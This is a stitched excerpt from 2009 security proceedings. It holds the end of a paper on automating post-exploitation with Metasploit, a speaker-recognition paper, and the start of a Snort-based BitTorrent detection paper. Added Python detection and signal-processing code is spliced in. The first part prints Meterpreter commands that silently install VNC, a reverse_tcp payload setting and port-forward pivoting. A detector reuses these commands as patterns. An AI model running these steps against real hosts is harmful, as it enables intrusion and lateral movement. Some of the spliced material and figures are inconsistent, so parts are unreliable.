client.sys.process.execute('cmd.exe', '/c regedit -s vnc.reg', 'Channelized'=>false)
sleep(2)
print_status("installing the VNC...")
client.sys.process.execute('cmd.exe', '/c WinVNC -install', 'Channelized'=>false)
sleep(5)
print_status("starting the VNC...")
client.sys.process.execute('cmd.exe', '/c net start "VNC server" && winvnc', 'Channelized'=>false)
puts("Installed!")
After installation the required services are generated and they have a startup status of automatic. The attacker can use a web interface to interact with the console of the exploited machine. Obviously, the exploited machine has to be directly routable from the attacker's host.
Automatically Scanning by Nmap. For automatic scanning purposes in a post-exploit script, Nmap is a good choice because it is powerful, having different pinging techniques, fully supports a command line interface, can be scripted, and has a good reputation among security researchers. As the scanning script requires the nmap tool, it is a script of type 3. The script performs the following tasks on the exploited machine:
– Finding the IP configuration of each NIC.
– Calculating the length of the network portion from the given subnet.
– Calculating the network address of the related subnet.
– Transferring the required Nmap files and the file which contains the network addresses.
– Performing a fast scan against the whole network, or any type of scan the attacker requires.
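From the defender's side, every degree-2 and degree-3 script above, and the VNC installer, leaves a cmd.exe command line in process-creation logs. The following Python is an added example (not the paper's code) that matches those command lines over constructed Sysmon-style events; the event field names, the parent-process allowlist and the sample events are assumptions made for the example.

```python
"""Detection of the post-exploit command lines discussed above: chained recon
commands behind "cmd.exe /c", WMIC inventories written to a file, a VNC service
being installed, and cmd.exe running as SYSTEM under an unexpected parent.
Event field names are an assumption modelled on Sysmon Event ID 1."""
import re
from dataclasses import dataclass

# Commands the degree-2 scripts chain behind "cmd.exe /c ... && ..."
RECON_COMMANDS = ("systeminfo", "set", "ver", "fsutil", "net user",
                  "net localgroup", "net start", "sc query", "tasklist")
# Parents from which a SYSTEM cmd.exe is routine (assumed allowlist for this example)
SERVICE_PARENTS = {"services.exe", "svchost.exe"}
# Degree-3 scripts: wmic ... /output:<file> or /append:<file> ... /format:csv
WMIC_EXPORT = re.compile(r"\bwmic\b.*/(?:output|append):\S+.*/format:csv", re.I)
# VNC installer steps: regedit -s vnc.reg, WinVNC -install, net start "VNC server"
VNC_INSTALL = re.compile(
    r"\bwinvnc(?:\.exe)?\s+-install\b|net start\s+\"vnc server\"|regedit\s+-s\s+\S+\.reg",
    re.I)


@dataclass
class Finding:
    event_id: int
    rule: str
    detail: str


def split_chain(command_line):
    """Return the commands chained behind 'cmd.exe /c', lower-cased."""
    m = re.search(r"/c\s+(.*)$", command_line, re.I)
    body = m.group(1) if m else command_line
    return [p.strip().lower() for p in re.split(r"&&|\|\||&|\|", body) if p.strip()]


def recon_commands_in(chain):
    """Set of recon commands present in a command chain (whole-word prefix match)."""
    return {r for r in RECON_COMMANDS for c in chain if c == r or c.startswith(r + " ")}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def scan_event(ev):
    """Apply every rule to one process-creation event and return its findings."""
    findings = []
    cl = ev["command_line"]
    if basename(ev["image"]) == "cmd.exe":
        hits = recon_commands_in(split_chain(cl))
        if len(hits) >= 3:  # one shell doing three or more recon commands at once
            findings.append(Finding(ev["id"], "chained_recon", ", ".join(sorted(hits))))
        parent = basename(ev["parent_image"])
        if ev["user"].upper() == "NT AUTHORITY\\SYSTEM" and parent not in SERVICE_PARENTS:
            findings.append(Finding(ev["id"], "system_cmd_unexpected_parent", parent))
    if WMIC_EXPORT.search(cl):
        findings.append(Finding(ev["id"], "wmic_inventory_export", cl))
    if VNC_INSTALL.search(cl):
        findings.append(Finding(ev["id"], "vnc_install", cl))
    return findings


def scan(events):
    return [f for ev in events for f in scan_event(ev)]


# Constructed sample events; the command lines are the ones the scripts above issue.
EXPLOITED_SVC = r"C:\Program Files\ExampleSvc\examplesvc.exe"  # constructed parent
CMD = r"C:\Windows\System32\cmd.exe"
SYSTEM = r"NT AUTHORITY\SYSTEM"
SAMPLE_EVENTS = [
    {"id": 1, "image": CMD, "parent_image": EXPLOITED_SVC, "user": SYSTEM,
     "command_line": "cmd.exe /c systeminfo && set && ver && fsutil fsinfo drives"
                     " && net user && net localgroup"},
    {"id": 2, "image": CMD, "parent_image": EXPLOITED_SVC, "user": SYSTEM,
     "command_line": "cmd.exe /c wmic /output:wmic_sysinfo.txt /interactive:off"
                     " CPU list brief /format:csv"},
    {"id": 3, "image": CMD, "parent_image": EXPLOITED_SVC, "user": SYSTEM,
     "command_line": "cmd.exe /c WinVNC -install"},
    {"id": 4, "image": CMD, "parent_image": EXPLOITED_SVC, "user": SYSTEM,
     "command_line": 'cmd.exe /c net start "VNC server" && winvnc'},
    {"id": 5, "image": CMD, "parent_image": r"C:\Windows\explorer.exe", "user": r"CORP\alice",
     "command_line": r"cmd.exe /c dir C:\Users\alice"},  # benign interactive use
    {"id": 6, "image": CMD, "parent_image": EXPLOITED_SVC, "user": SYSTEM,
     "command_line": "cmd.exe /c net start && sc query && tasklist /v && tasklist && tasklist /m"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.rule}: {f.detail}")
```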
4.4 Integration of Pivoting
As mentioned before, in some cases it is not possible to reach a target directly; in order to exploit such a target another machine has to be exploited first, and by pivoting through that exploited machine it is then possible to start exploiting other machines which are not directly reachable. The standalone script is able to cover this requirement. The config file should contain more than 5 lines (the first 5 lines are the settings for the first machine). Each additional 5 lines indicate another machine which should be exploited via the first machine. The method used for pivoting is the port forwarding feature of the Meterpreter payload (the following code uses an exploit that targets TCP port 135, but the original script finds the port dynamically):
'Payload'   => 'windows/meterpreter/reverse_tcp',
'OptionStr' => 'RHOST=127.0.0.1 RPORT=135 LHOST='+MyPublicAddress+' LPORT='+MyTcpPort.to_s,
The payload is a reverse shell, and after exploitation the remote machine will connect back to the attacker's host. The attacker has to define a port forwarder to be able to communicate with the remote machine:
myStr = 'portfwd add -L 127.0.0.1 -l 135 -r '+$myTarget[i+1].to_s+' -p 135'
puts myStr
portFwdResult = $session[0].run_cmd(myStr)
5 Conclusion
In this paper we have shown how Metasploit can be used to automate post-exploitation. Using the scripts presented, targets can be attacked that are not directly routable. This mechanism of pivoting allows a system that has been exploited to serve as a base for the next attack, leading to a cascade of exploited hosts. The final target host can then communicate with the attacker through reverse communication. Systems that are secured with multiple layers such as [EPW04] can then also be attacked.
References
[Bag08] Baggett, M.: Effectiveness of antivirus in detecting Metasploit payloads. SANS Institute (2008)
[EPW04] Essmayr, W., Probst, S., Weippl, E.: Role-based access controls: Status, dissemination, and prospects for generic security mechanisms. Electronic Commerce Research (2004)
[Met] Metasploit, http://www.metasploit.com/
[MMC+07] Maynor, D., Mookhey, K.K., Cervini, J., Roslan, F., Beaver, K.: Metasploit Toolkit for Penetration Testing. Syngress Press (2007)
[Rem] Remote library injection, http://www.nologin.org/downloads/papers/remote-library-injection.pdf
Speaker Dependent Frequency Cepstrum Coefficients
Filip Orság
Faculty of Information Technology, Bozetechova 2, 612 66 Brno, Czech Republic
[email protected]
Abstract. This paper aims at speaker recognition based upon a novel set of features. Feature extraction is a crucial phase of the speaker recognition process, and a proper feature set can influence it dramatically. Many well-known features are not suitable for speaker recognition, as they merge the specifics of the individual voices to make them universal. Therefore, we need features accentuating the individual differences of our voices to be able to recognise speakers reliably. This paper introduces Speaker Dependent Frequency Cepstrum Coefficients (SDFCC) intended for speaker recognition purposes only. Experimental results prove an increase in reliability in comparison to the well-known features. According to the test results, the SDFCC are very useful and promising for speaker recognition.
Keywords: speaker, recognition, verification, identification, features.
1 Introduction
Person identification or verification based on speaker recognition is one of the most exciting technologies in biometrics. This is mainly due to the fact that voice is one of the most natural forms of identification for humans. Speaker recognition is divided into two main groups: speaker identification and speaker verification. The process of speaker identification answers the question "Who is speaking?" On the other hand, speaker verification answers the question "Is the one who is speaking really the one they claim to be?" Thus, in the case of speaker identification we are trying to find the owner of an unknown voice among many other known voices, and in the case of speaker verification we would like to determine the similarity of an unknown voice to a known voice (e.g. stored in a database). There are many ways to compare two voices. However, in almost all of them we have to extract some specific features to be able to compare them. The following section describes a new set of features designed specifically for voice-based person identification or verification.
2 Speaker Dependent Features
Speaker dependent features are speaker-recognition-oriented features. These features emphasise speaker individuality and are not usable for purposes other than speaker recognition itself. These features are based on the algorithm used to calculate the well-known Mel-Frequency Cepstrum Coefficients (MFCC [1]). The main difference lies in the design of the filter bank.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 258–264, 2009. © Springer-Verlag Berlin Heidelberg 2009
2.1 Filter Design
For the purpose of speaker recognition, a triangular filter was chosen. The filter is a frequency-domain filter applied to the discrete frequency spectrum of a signal. Suppose the length of the discrete frequency spectrum is N samples, which implies the original signal is 2N samples long. The following filter is defined in the discrete frequency domain. Consider $0 \le f_{low} \le 0.5 \cdot F_s$ a frequency in the frequency domain, where $F_s$ is the sampling frequency and N is the length of the signal. Then it corresponds to the discrete frequency $F_{low} = f_{low} \cdot (N \cdot F_s)^{-1}$. The triangular filter is defined in the discrete frequency domain by three basic frequencies $0 \le F_{low} < F_{centre} < F_{high} < N$, amplitude A and the length of the filter, which
equals N samples.
$$
H_{Triang}(k, F_{low}, F_{centre}, F_{high}) =
\begin{cases}
0, & k = 0, 1, \dots, F_{low} - 1 \\
A \cdot \dfrac{k - F_{low}}{F_{centre} - F_{low}}, & k = F_{low}, F_{low} + 1, \dots, F_{centre} \\
A \cdot \left( 1 - \dfrac{k - F_{centre}}{F_{high} - F_{centre}} \right), & k = F_{centre} + 1, F_{centre} + 2, \dots, F_{high} \\
0, & k = F_{high} + 1, F_{high} + 2, \dots, N - 1
\end{cases}
\qquad (1)
$$
where $k = 0, 1, \dots, N-1$ is a discrete frequency, $0 \le F_{low} < F_{centre} < F_{high} < N$ are the basic filter frequencies, A denotes the amplitude of the filter, and the length of the filter is N samples.
2.2 Speaker Dependent Frequency Filter Bank
The Speaker Dependent Frequency Filter Bank (SDFFB) is a new approach to the filter bank definition. It is based on an average long-term Linear Prediction Coding (LPC) spectrum [2]. The SDFFB is much like the mel-frequency based bank of triangular filters [3], but it differs from the mel-frequency based filter bank in the distribution of the filter centres, in the amplitude of the filters, and in the shape of the filters. The basic idea results from the dissimilarity of human vocal tracts. The shapes of the vocal tracts obviously differ in some important details. A model of the vocal tract can be calculated mathematically [4]. When speech is being recognised, it is useful to extract features which are speaker independent. This does not hold true in the case of speaker recognition. In this case, it is necessary to extract speaker dependent features. A normalised spectrum (see Fig. 1, left) can be used for the purposes of speaker recognition. The maxima and the minima in the spectrum become the central frequencies $F_{centre}$ of the individual filters in terms of the previous filter definition. First, we define an ordered set of the maxima and minima. For the design of the filter I decided to use the first eight extremes [10]. We put all the extremes in an ordered set:
$$
F(i) = \left\{ f_0^{max}, f_1^{min}, \dots, f_L^{max}, f_{L+1}^{min} \right\}, \quad i = 0, 1, \dots, I + 1, \qquad (2)
$$
where $f_l^{max}$ is the position of the l-th maximum, $f_l^{min}$ is the position of the l-th minimum, and I = 2L is the total number of filters in the filter bank. You can see that there is one maximum at the position i = 0 and one minimum at the position l = L + 1. This is because of the properties of the algorithm. Given the set F(i) of 2L + 2 frequencies, we can define the filter bank itself. The filter bank consists of I = 16 filters, hence we need at least L = 8 extremes plus one more maximum and one more minimum. It was experimentally verified that the number of extremes is even higher than 8 (approximately 11 – 12 extremes). Generally, the filter bank is defined as
$$
H_{SDFB}(i, k) = H_{Triang}\left( k, F(i-1), F(i), F(i+1) \right), \quad i = 1, 2, \dots, I, \qquad (3)
$$
where I is the total number of filters $H_{Triang}(k, F_{low}, F_{centre}, F_{high})$, k is a discrete frequency $k = 0, 1, \dots, N-1$ and N is the length of the signal. In the triangular filter definition above, an amplitude A appeared. Two types of Speaker Dependent Frequency Filter Banks were proposed: type I and type II. The Speaker Dependent Frequency Filter Bank of type I (SDFFB-I) assumes the amplitude A = 1. We call this type of filter bank a constant amplitude filter bank. The SDFFB of type II (SDFFB-II) assumes the amplitudes of the individual filters equal to the values of the long-term LPC spectrum at the positions of $F_{centre}$. We call this type of filter bank a variable amplitude filter bank (see Fig. 1, right).
Fig. 1. Left - LPC spectrum and normalized LPC spectrum (solid line - the original LPC spectrum, dotted line - the normalized LPC spectrum). Right - Triangular filter bank of type II.
2.3 Speaker Dependent Frequency Cepstrum Coefficients
The Speaker Dependent Frequency Cepstrum Coefficients (SDFCC) are much like the mel-frequency cepstrum coefficients in terms of the algorithm used for their calculation. Nevertheless, there is an essential difference between them: the filter bank used for the computation of the coefficients. The SDFCC are computed using the Speaker Dependent Frequency Filter Bank described in the previous section. The process of calculating the SDFCC is the same as in the case of the MFCC. The first difference is the use of the speaker dependent filter bank $H_{SDFB}(i, k)$ given by Eq. 6. Then we can express the log-energy at the output of the speaker dependent filters as
$$
C_{SDFB}(i) = \ln \left( \sum_{k=0}^{N-1} \left| H_{SDF}(i, k) \cdot S(k) \right|^2 \right), \quad i = 1, 2, \dots, I, \qquad (4)
$$
where I is the total number of filters in the filter bank and S(k) is the Fast Fourier Transform (FFT [3]) of the signal s(n), which is N samples long. We use the new coefficients $C_{SDFB}(i)$ to calculate the SDFCC using the following equation:
$$
c_{SDFB}(j) = \sum_{i=0}^{I-1} C_{SDFB}(i) \cdot \cos \left( \pi n \, \frac{i - 1}{2I} \right), \quad j = 0, 1, \dots, I, \qquad (5)
$$
Although the SDFCCs are computed the same way as the MFCCs, they are not the same at all. The difference in the filter banks and filter shapes results in very different results in the case of speaker recognition. The SDFCC cannot be used in universal speech recognition systems, since they emphasise the speaker influence too much. However, they could be used in a speech recognition system oriented to one user. There can be some fields of application for such systems. It could be a 2-in-1 system, in which you can command a device using your voice and, at the same time, protect it using your voice. The device is protected because it would not recognise spoken commands given by another user.
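The SDFCC chain of Sections 2.1 to 2.3, carried through as an added Python example that is not part of the paper: Eq. (1) as the triangular filter, the ordered extremes of a normalised long-term LPC spectrum as the set F(i) of Eq. (2), Eq. (3) as the type I or type II bank, and Eq. (4) as the filter log-energies. The normalised LPC spectrum and the frame spectrum are constructed inputs, the tie-breaking that keeps the extremes strictly alternating is my choice, and the final cepstral step uses the MFCC-style DCT-II, which is an assumption about the exact form of the transform.

```python
"""SDFCC pipeline in plain Python (added example). Inputs are constructed."""
import math


def h_triang(k, f_low, f_centre, f_high, a=1.0):
    """Eq. (1): triangular filter with amplitude a, evaluated at discrete frequency k."""
    if k < f_low or k > f_high:
        return 0.0
    if k <= f_centre:
        return a * (k - f_low) / (f_centre - f_low)
    return a * (1.0 - (k - f_centre) / (f_high - f_centre))


def ordered_extremes(spectrum):
    """Eq. (2): positions of the interior maxima and minima of the normalised LPC
    spectrum, strictly alternating, starting with a maximum and ending with a minimum.
    Consecutive extremes of the same kind keep only the first (assumed tie-break)."""
    raw = []
    for k in range(1, len(spectrum) - 1):
        left, mid, right = spectrum[k - 1], spectrum[k], spectrum[k + 1]
        if left < mid > right:
            raw.append((k, "max"))
        elif left > mid < right:
            raw.append((k, "min"))
    alt = [e for n, e in enumerate(raw) if n == 0 or raw[n - 1][1] != e[1]]
    while alt and alt[0][1] != "max":
        alt.pop(0)
    while alt and alt[-1][1] != "min":
        alt.pop()
    return [pos for pos, _ in alt]


def sdfb(extremes, n, amplitudes=None):
    """Eq. (3): filter i spans F(i-1) < F(i) < F(i+1), i = 1..I, with I = len(F) - 2.
    amplitudes=None gives the type I bank (A = 1); amplitudes[i] = LPC spectrum value
    at F(i) gives the variable-amplitude type II bank."""
    n_filters = len(extremes) - 2
    if n_filters < 1:
        raise ValueError("F(i) needs at least four alternating extremes")
    bank = []
    for i in range(1, n_filters + 1):
        a = 1.0 if amplitudes is None else amplitudes[i]
        bank.append([h_triang(k, extremes[i - 1], extremes[i], extremes[i + 1], a)
                     for k in range(n)])
    return bank


def log_energies(bank, spectrum_mag):
    """Eq. (4): C_SDFB(i) = ln(sum_k |H(i,k) S(k)|^2), floored so ln(0) cannot occur."""
    return [math.log(max(sum((h * s) ** 2 for h, s in zip(filt, spectrum_mag)), 1e-12))
            for filt in bank]


def sdfcc(log_energy, n_coeffs):
    """Cepstrum of the filter log-energies. Assumed MFCC-style DCT-II:
    c(j) = sum_{i=1..I} C(i) cos(pi j (i - 0.5) / I)."""
    n_filters = len(log_energy)
    return [sum(c * math.cos(math.pi * j * (i + 0.5) / n_filters)
                for i, c in enumerate(log_energy)) for j in range(n_coeffs)]


N = 64  # length of the discrete spectrum; the frame itself is 2N samples long
# Constructed stand-in for a normalised long-term LPC spectrum: three smooth humps.
LPC_NORM = [1.0 + 0.5 * math.sin(2 * math.pi * 3 * k / N) for k in range(N)]
# Constructed |S(k)| of one analysis frame; flat, so each C(i) is just ln(sum_k H(i,k)^2).
FRAME_MAG = [1.0] * N


def demo(variable_amplitude=False, n_coeffs=4):
    """Run the whole chain on the constructed inputs and return every intermediate."""
    f_set = ordered_extremes(LPC_NORM)
    amps = [LPC_NORM[f] for f in f_set] if variable_amplitude else None
    bank = sdfb(f_set, N, amps)
    energies = log_energies(bank, FRAME_MAG)
    return f_set, bank, energies, sdfcc(energies, n_coeffs)


if __name__ == "__main__":
    f_set, bank, energies, coeffs = demo()
    print("F(i):", f_set, "-> I =", len(bank), "filters (type I)")
    print("C_SDFB:", [round(c, 4) for c in energies])
    print("SDFCC :", [round(c, 4) for c in coeffs])
```

With the constructed spectrum the six extremes give I = 4 filters rather than the paper's 16; the code does not change for a real LPC spectrum with more extremes.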
3 Experimental Results
Some experiments were done to prove the validity of the algorithms and to test the quality of the proposed features. For the purpose of the experiments, a voice database was created in order to test all suggested features and algorithms [10]. The tests included LPC coefficients, the MFCC with delta coefficients, cepstral coefficients and the new speaker dependent coefficients proposed in this paper. The first feature sets consisted of the first 12 (LPC-12) and 24 (LPC-24) LPC coefficients. The other sets consisted of the Mel-Frequency Cepstrum Coefficients, which are very widely used in speech recognition. These sets were 13 MFCC, 13 MFCC with 13 first order delta coefficients (MFCC+D), and 13 MFCC with 13 MFCC+D and 13 second order delta coefficients (MFCC+DD). The last common coefficients were the cepstral coefficients – 12 and 24 coefficients of the cepstrum. Next, there was a group of two Speaker Dependent Frequency Cepstrum Coefficients (SDFCC) based sets consisting of 16 coefficients calculated using the triangular filter bank of type I and II.
3.1 Speaker Verification and Identification
The speaker recognition experiments consisted of two main groups – the speaker verification approach and the speaker identification approach to speaker recognition [7]. The recogniser was based on a Hidden Markov Model with Gaussian Mixtures (HMM-GM [8]) with 3 states, which is sufficient for the given conditions.
Fig. 2. FRR (solid line) and FAR (dotted line) as functions of the threshold T for the verification process on the combined set of samples (6 training samples + 5 unknown samples for every speaker). The commonly used feature sets – LPC, MFCC and cepstrum coefficients – are compared to the SDFCC of type I and II. For the MFCC and SDFCC-I-Triang the EER and the corresponding threshold T are marked.
Table 1. Summary of the experimental results of the speaker verification (V) and identification (I); all values are EER [%] on the given group of testing samples

Features | combined samples V | combined samples I | unknown samples V | unknown samples I | training samples V | training samples I
LPC12 | 2.88 | 7.71 | 4.80 | 16.24 | 0.53 | 0.60
LPC24 | 5.05 | 10.18 | 7.98 | 20.00 | 1.29 | 2.87
MFCC | 6.70 | 25.93 | 11.53 | 42.64 | 1.34 | 12.00
MFCC+D | 16.71 | 47.45 | 24.17 | 48.64 | 10.50 | 45.20
MFCC+DD | 30.17 | 47.56 | 83.92 | 49.12 | 22.92 | 44.60
CEPS12 | 10.81 | 37.38 | 12.46 | 41.76 | 9.60 | 33.73
CEPS24 | 30.72 | 48.25 | 29.89 | 47.92 | 72.31 | 48.53
SDFCC-I-Triang | 2.06 | 2.91 | 4.10 | 6.40 | 0.00 | 0.00
SDFCC-II-Triang | 2.12 | 2.40 | 4.13 | 5.28 | 0.00 | 0.00
Three groups of samples were tested. The first one was a combination of six training samples and five unknown samples, the second group contained the six training samples only, and the third group contained the five unknown samples only, which is closest to reality, since in real-world applications there are only unknown samples. All the results are summarised in Table 1. The best real-world verification solutions were the SDFCC-I-Triang and SDFCC-II-Triang based feature sets with EER = 4.10 %. The best identification solution is SDFCC-II-Triang with an EER of 5.28 %. In Fig. 2, you can compare the relationship of the False Acceptance Rate (FAR) and the False Rejection Rate (FRR) [7][9] with the threshold T when using the common features and the SDFCC on the combined testing samples. The curves differ for each feature set. The curves obtained with the MFCC feature set seem almost ideal; however, the Equal Error Rate (EER) [7][9] is rather high in comparison to the EER of LPC12.
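To make the FAR/FRR trade-off of Fig. 2 and the EER figures of Table 1 concrete, here is an added Python example written for this page (not the paper's evaluation code). It takes a list of genuine-speaker scores and a list of impostor scores (constructed here; in the paper they would be HMM likelihoods), sweeps the threshold T, and reports the operating point where FAR and FRR meet. The score values and the convention "higher score means more likely genuine" are assumptions.

```python
def far(impostor_scores, threshold):
    """False Acceptance Rate: share of impostor trials whose score reaches the threshold."""
    return sum(1 for s in impostor_scores if s >= threshold) / len(impostor_scores)


def frr(genuine_scores, threshold):
    """False Rejection Rate: share of genuine trials whose score falls below the threshold."""
    return sum(1 for s in genuine_scores if s < threshold) / len(genuine_scores)


def far_frr_curve(genuine_scores, impostor_scores):
    """FAR(T) and FRR(T) sampled at every distinct score: the two curves plotted in Fig. 2.
    Raising T lowers FAR and raises FRR; the verifier's policy picks the point on this curve."""
    thresholds = sorted(set(genuine_scores) | set(impostor_scores))
    return [(t, far(impostor_scores, t), frr(genuine_scores, t)) for t in thresholds]


def equal_error_rate(genuine_scores, impostor_scores):
    """EER: the operating point where FAR and FRR are closest; returns (eer, threshold).
    With a finite sample the curves rarely cross exactly, so the mean of the two is reported."""
    best = min(far_frr_curve(genuine_scores, impostor_scores), key=lambda p: abs(p[1] - p[2]))
    t, accept_rate, reject_rate = best
    return (accept_rate + reject_rate) / 2, t


# Constructed verification scores, not the paper's data. Each list holds one score per
# trial: GENUINE are claimed-identity trials by the true speaker, IMPOSTOR by other speakers.
GENUINE = [0.91, 0.87, 0.85, 0.80, 0.78, 0.74, 0.70, 0.66, 0.60, 0.55]
IMPOSTOR = [0.62, 0.58, 0.50, 0.45, 0.40, 0.38, 0.33, 0.30, 0.25, 0.20]


def demo():
    """Run the sweep on the constructed scores and return the EER and its threshold."""
    eer, t = equal_error_rate(GENUINE, IMPOSTOR)
    return {"eer": eer, "threshold": t}
```

The "training samples" column of Table 1 corresponds to scoring the very utterances the models were trained on, which is why it reads 0.00 % for the SDFCC sets; only trials drawn from unseen utterances, as in the impostor list above, say anything about how the verifier will behave in deployment.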
4 Conclusions
This paper deals with speaker recognition technology based on the HMM and using a new feature set designed especially for speaker recognition purposes – Speaker Dependent Frequency Cepstrum Coefficients (SDFCC). These coefficients aim at speaker recognition and, in some special cases, are also usable for speech recognition. The experimental results prove their qualities. The speaker verification test proved the capability of the SDFCC for this task. The Equal Error Rate (EER), which was lower than 5% in nearly all cases with the minimum at 3.9%, is excellent. The results of the speaker identification are not shameful either. The EER, overall lower than 8% with the best EER of 5.04%, is good enough. The good performance of the speaker recognition results from the dependence of the new features on the speaker, because it strengthens the speaker's individual voice characteristics. Generally, the verification approach turned out to perform better than the identification approach, which was expected and has been proved many times before.
Acknowledgements. This research has been done under the support of the Ministry of Education of the Czech Republic by the grant "Security-Oriented Research in Information Technology", MSM0021630528 (CZ).
References
1. Rodman, D.R.: Computer Speech Technology. Artech House, Boston (1999)
2. Sigmund, M.: Speaker Normalization by Long-Time Spectrum. In: Proceedings of Radioelektronika 1996, Brno, CZ, pp. 144–147 (1996)
3. Oppenheim, A.V., Schafer, R.W., Buck, J.R.: Discrete-Time Signal Processing, 2nd edn. Prentice Hall, Upper Saddle River (1999)
4. Sigmund, M.: Estimation of Vocal Tract Long-Time Spectrum. In: Proceedings of Elektronische Sprachsignalverarbeitung, Dresden, vol. 9, pp. 190–192 (1998)
5. Sigmund, M.: Speaker Recognition – Identifying People by their Voices. Conferment thesis FEE BUT, Brno (2000) ISBN 80-214-1590-8
6. Markel, J.D., Gray, A.H.: Linear Prediction of Speech. Springer, New York (1976)
7. Xafopoulos, A.: Speaker Verification. Tampere International Center for Signal Processing, TUT, Tampere, Finland (2001)
8. Baggenstoss, P.M.: Hidden Markov Models Toolbox. Naval Undersea Warfare Centre, Newport, RI (2001)
9. Woodward, J.D., Orlans, N.M., Higgins, P.T.: Biometrics: Identity Assurance in the Information Age. McGraw-Hill/Osborne, Berkley (2003)
10. Orsag, F.: Biometric Security Systems – Speaker Recognition Technology. Dissertation, Brno, CZ (2004)
Towards the Detection of Encrypted BitTorrent Traffic through Deep Packet Inspection
David A. Carvalho, Manuela Pereira, and Mário M. Freire
IT-Networks and Multimedia, Department of Computer Science, University of Beira Interior, Rua Marquês d'Ávila e Bolama, P-6201-001 Covilhã, Portugal
{david, mpereira, mario}@di.ubi.pt
Abstract. Nowadays, peer-to-peer file sharing applications are very popular, and the traffic volume generated by these applications accounts for a large percentage of the global network traffic. However, peer-to-peer traffic may compromise the performance of critical networked applications or network-based tasks in institutions, so that in some cases such traffic needs to be blocked. This task may be particularly difficult when the peer-to-peer traffic is encrypted. This paper presents a contribution towards the detection and blocking of encrypted peer-to-peer file sharing traffic generated by the BitTorrent application. The proposed method is based on deep packet inspection and makes use of Snort, a popular open source network-based intrusion detection system. Experiments have been carried out to validate the proposed method and its accuracy.
Keywords: Peer-to-peer file-sharing applications, traffic identification, deep packet inspection, traffic monitoring, peer-to-peer content filtering and management.
1 Introduction
As the Transmission Control Protocol/Internet Protocol (TCP/IP) architecture becomes the dominant architecture for applications, contents and services, these are gradually migrating from the client-server paradigm to the peer-to-peer (P2P) paradigm. Recently, P2P systems have received a great amount of interest as a promising scalable, reliable and cost-effective solution for multimedia content sharing and distribution. P2P file sharing applications such as BitTorrent, Vuze, eMule, Limewire and GTK-Gnutella, among others, have achieved tremendous success in the past few years. In this kind of system, as more clients join, more resources are made available, which speeds up downloading and therefore may attract more clients. The traffic generated by P2P applications has become a dominating part of the global Internet traffic, estimated to be around 60-70% [1], [2]. Without suitable network management, the traffic generated by this kind of application may compromise the performance of critical networked applications or network-based tasks in institutions.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 265–272, 2009. © Springer-Verlag Berlin Heidelberg 2009
The traffic generated by first generation P2P applications was relatively easy to detect because these applications used well-defined port numbers. Nowadays, however, the traffic generated by P2P applications may be very difficult to detect because P2P applications may use different port numbers to escape detection, may not use the default service port, or may use port 80, assigned to HTTP traffic [3], [4]. Besides, they may use obfuscation options where the traffic is encrypted, making its detection very difficult. On the other side, link speeds in LANs are reaching the Gigabit per second range, which may make detection infeasible since the processing speed cannot match the line speed, and capturing every packet may pose severe requirements in terms of processing and memory capacities. As detection and classification mechanisms evolve, P2P evasion techniques also evolve, making traffic detection and classification a very difficult task. Recently, some approaches have been proposed to detect P2P applications. These techniques may be classified into two main categories [2], [5]: those based on payload inspection or signature-based detection, and those based on flow traffic behaviour. Deep packet inspection methods inspect the packet payload to locate specific byte sequences, called signatures, that identify a given characteristic, protocol or application, whereas methods based on traffic behaviour attempt to detect and classify possible protocols or applications without looking into the payload contents. Some approaches have been proposed for traffic identification using behaviour-based methods.
The method based on transport-level connection patterns relies on two heuristics for P2P traffic classification: 1) the simultaneous use of TCP and UDP by a pair of communicating peers and 2) regarding the connection patterns for (IP, port) pairs, the number of distinct ports communicating with a P2P application on a given peer will likely match the number of distinct IP addresses communicating with it [2]. The behavioural method based on entropy reported in [5] requires the evaluation of the entropy of the packet sizes in a given time window and works on-the-fly. Several approaches requiring the analysis of some fields of the TCP or IP packet header for flow-based P2P traffic detection have been proposed based on machine learning [4], [6], support vector machines [7], [8], and neural networks [9]. This kind of method may be used for high-speed and real-time communications with encrypted traffic or unknown P2P protocols. The main drawback is the possible lack of accuracy in the identification of P2P traffic. Methods based on payload inspection may be accurate, but may lead to network performance degradation under low latency or high-speed operation. Besides, they may not be useful when the payload is encrypted, for new P2P protocols, or in cases where legal or privacy issues do not allow their use [2], [3]. Nowadays, one of the main challenges regarding P2P file-sharing traffic detection is the on-line detection of encrypted traffic under high-speed and real-time communications, where fast P2P traffic identification is required in order to avoid network performance degradation.
To address this issue, we are developing a hybrid method for on-line P2P traffic identification, including encrypted traffic, based on a combination of the flow behaviour method using the entropy of the packet sizes in a given time window reported in [5] and deep packet inspection, which complements the first approach in order to reduce false positives and false negatives. In this paper, we report the development of signatures for deep packet inspection of the BitTorrent application as a piece of the puzzle.
2 Methodology for P2P Traffic Detection Using Signatures
The methodology used for the detection of P2P file sharing traffic makes use of an open source and widely used intrusion detection system, called Snort [10], which runs on Windows, Linux/Unix or Mac operating systems, and is adapted from the methodology presented in [11]. The signatures of the packet payloads to identify are expressed as Snort rules. The identification of Snort rules for the detection of packets generated by a given P2P application requires the following steps: i) identification of signatures associated with a given P2P protocol that can be revealed through the analysis of the payload of an IP packet; ii) writing Snort rules incorporating these signatures in order to detect all packets carrying those particular signatures. Using this methodology, we developed Snort rules for the detection of P2P traffic generated by the BitTorrent application, paying particular attention to the detection of encrypted traffic. The identification of signatures associated with the packets generated by this application was made manually through the observation of repetitive patterns in the sequence of packets generated by BitTorrent, even with encryption of the payload. The common patterns observed in the payload were then used to manually write the rules for the detection engine, which allow the identification of a given packet that contains that particular pattern at a particular position, or after a given offset, in its payload.
3 Experimental Setup
The experimental testbed includes several machines with different characteristics and running different operating systems at our research lab (NMCG Lab). All outgoing and incoming traffic for the servers, workstations and laptops used at this lab is controlled by a computer running Smoothwall Express 3.0, a network administration specific Linux distribution from the SmoothWall Open Source Project [12], which provides Internet security and Web filtering products. Although SmoothWall Express 3.0 does not have the same capabilities as the commercial products, it offers powerful extended possibilities at very low cost, which was the main reason for its choice during the NMCG lab planning and deployment. This lab has 24 8P8C sockets connecting to an Enterasys C2H128-48 switch through UTP Ethernet Enhanced Cat5 cabling. The switch then connects to the network backbone device of the Department of Computer Science building, an Enterasys E7 just one floor above, via an optical fibre uplink, which in turn connects to the rest of the University. All external communication with the University is made through an Enterasys SSR main router, located at the Center for Computer Science of the University. Running P2P software does not usually require 